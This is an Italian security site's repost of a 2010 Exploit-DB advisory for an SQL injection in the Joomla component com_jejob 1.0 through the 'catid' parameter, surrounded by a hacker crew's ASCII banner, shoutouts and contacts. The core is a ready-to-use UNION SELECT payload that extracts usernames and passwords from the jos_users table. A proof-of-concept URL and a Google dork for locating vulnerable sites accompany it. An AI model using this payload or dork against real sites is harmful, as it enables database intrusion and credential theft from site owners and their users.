Sei qui: Servizi Sicurezza CMS Vulnerabilità Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability

Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability

Creato Domenica, 30 Maggio 2010 17:38
# Title: Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability
# EDB-ID: 12782
# CVE-ID: ()
# OSVDB-ID: ()
# Author: v3n0m
# Published: 2010-05-28
# Verified: yes
# Download Exploit Code
# Download N/A

)   )            )                     (   (         (   (    (       )     )
( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(
)\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <
|_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
.WEB.ID
-----------------------------------------------------------------------
Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : May, 29-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : JE Job
Vendor      : http://joomlaextensions.co.in/
License     : GPLv2
Version     : 1.0 Lower versions may also be affected
Google Dork : inurl:com_jejob
User can search the job by Location or by Job Title or by Experience. User can
also see the job category at the front page. Category wise jobs are displayed in it.
----------------------------------------------------------------
Exploitz:
~~~~~~~
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/index.php?option=com_jejob&view=item&catid=[SQLi]
----------------------------------------------------------------
Shoutz:
~~~~
- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [ Mizz U so much... ]
- Joss [at] hack0wn.com
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update donk >_<
---------------------------[EOF]--------------------------------
Categoria: Vulnerabilità Joomla